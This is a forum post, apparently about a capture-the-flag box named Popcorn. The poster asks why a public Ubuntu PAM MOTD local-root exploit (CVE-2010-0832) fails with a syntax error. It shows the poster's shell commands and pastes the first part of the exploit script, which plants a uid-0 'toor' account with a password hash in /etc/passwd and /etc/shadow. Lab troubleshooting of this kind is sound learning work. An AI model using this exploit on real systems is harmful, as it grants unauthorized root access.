Hi,
So as per the topic title I am attempting priv esc on popcorn after getting a shell as www-data.
I spawned what I think is a partially interactive shell with:
$ python -c 'import pty; pty.spawn("/bin/sh")'
I used wget to fetch the exploit '14339.sh' and made it executable with:
$ chmod +x 14339.sh
When I try and run the script without specifying the full paths to bash/the exploit with the following:
$ ./14339.sh
I get the following error:
/bin/sh: ./14339.sh: not found (I include this because I wonder if this might help explain why the exploit is failing).
So I run (and get the following response):
$ /bin/sh /var/www/torrent/upload/14339.sh
/bin/sh /var/www/torrent/upload/14339.sh
[*] Ubuntu PAM MOTD local root
$
When I run:
$ /bin/bash /var/www/torrent/upload/14339.sh
The following error is returned:
[*] Ubuntu PAM MOTD local root
'var/www/torrent/upload/14339.sh: line 39: syntax error near unexpected token `{
'var/www/torrent/upload/14339.sh: line 39: `backup() {
Basically the script is erroring at the same point; bash just gives a little bit more feedback.
Is this some sort of shell issue that I am not familiar with?
The script up to/after line 39 seems perfectly fine to me, but these problems are usually something simple I am missing. I have included it below:
#!/bin/bash
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 LTS (Lucid Lynx)
# CVE: CVE-2010-0832
# Patch Instructions: sudo aptitude -y update; sudo aptitude -y install libpam~n~i
# References: Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1) - Linux local Exploit by Kristian Erik Hermansen
# Local root by adding temporary user toor:toor with id 0 to /etc/passwd & /etc/shadow.
# Does not prompt for login by creating temporary SSH key and authorized_keys entry.
#   user@ubuntu:~$ bash ubuntu-pam-motd-localroot.sh
#   [*] Ubuntu PAM MOTD local root
#   [*] Backuped /home/user/.ssh/authorized_keys
#   [*] SSH key set up
#   [*] Backuped /home/user/.cache
#   [*] spawn ssh
#   [+] owned: /etc/passwd
#   [*] spawn ssh
#   [+] owned: /etc/shadow
#   [*] Restored /home/user/.cache
#   [*] Restored /home/user/.ssh/authorized_keys
#   [*] SSH key removed
#   [+] Success! Use password toor to get root
#   Password:
#   root@ubuntu:/home/user# id
#   uid=0(root) gid=0(root) groupes=0(root)
P='toor:x:0:0:root:/root:/bin/bash'
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.cI7NQtsNz1:14798:0:99999:7:::'
echo "[*] Ubuntu PAM MOTD local root"
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement" && exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running sshd is a requirement" && exit 1
backup() {
    [ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
    [ -e "$1" ] || return 0
    mv "$1"{,.bak} || return 1
    echo "[*] Backuped $1"
}